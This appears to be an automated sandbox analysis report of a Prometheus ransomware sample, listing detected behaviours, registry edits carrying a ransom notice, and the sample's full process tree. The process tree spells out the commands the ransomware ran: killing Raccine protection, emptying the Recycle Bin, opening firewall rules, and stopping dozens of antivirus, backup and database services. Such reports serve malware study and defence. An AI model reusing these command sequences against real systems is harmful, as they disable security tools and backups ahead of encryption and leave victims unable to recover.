Analysis Overview
SHA256
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184
Threat Level: Known bad
The file dd4eb8aa3371b7fd821a7a9730c924cf.exe was found to be: Known bad.
Malicious Activity Summary
Prometheus Ransomware
Downloads PsExec from SysInternals website
Modifies extensions of user files
Blocklisted process makes network request
Modifies Windows Firewall
Downloads MZ/PE file
Drops startup file
Deletes itself
Modifies file permissions
Looks up external IP address via web service
Modifies WinLogon
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Discovers systems in the same network
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
System policy modification
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-30 11:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-06-02 15:02
Reported
2021-06-02 15:04
Platform
win7v20210410
Max time kernel
134s
Max time network
135s
Command Line
Signatures
Prometheus Ransomware
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec.exe | N/A | N/A |
Modifies Windows Firewall
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\MergeUpdate.tiff | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..." | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe
"C:\Users\Admin\AppData\Local\Temp\dd4eb8aa3371b7fd821a7a9730c924cf.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "395958801-8933661151793810850-158212092081090685311883140302228880-203348247"
C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1164146697-1757351519121954960-1598656531-194259269417710956351476371403917931529"
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1872053314-1445472940324293419-21159644872012361511644811687233454261014497176"
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1997061358-1814872304457674714-448730642926788787392561543676311-1022516745"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11808829151551623970477387295749141643-152999599157424081418553353751668623076"
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1806817180-324525989-1350126046-42631602711286792791551640673-355785847-591603542"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1349524300-264491354-422650865-170000379-12372704311559823258693977574273300569"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2284102851750714218-17956263341356059538-68260397-1688964880437469013-1505944464"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-367323984289478961-400712025-5575469-1897964322-1857134293-1298701124-1890941733"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1101567333-772160772-62232171180505311-1027584156-493040275-8296030121660249177"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-137596843016207695801466659247-788240315-1946335369-172572203719260333741454974235"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "901099379-1722020870805074732-851632885-1456233066-674386539-1419802802-1527311146"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
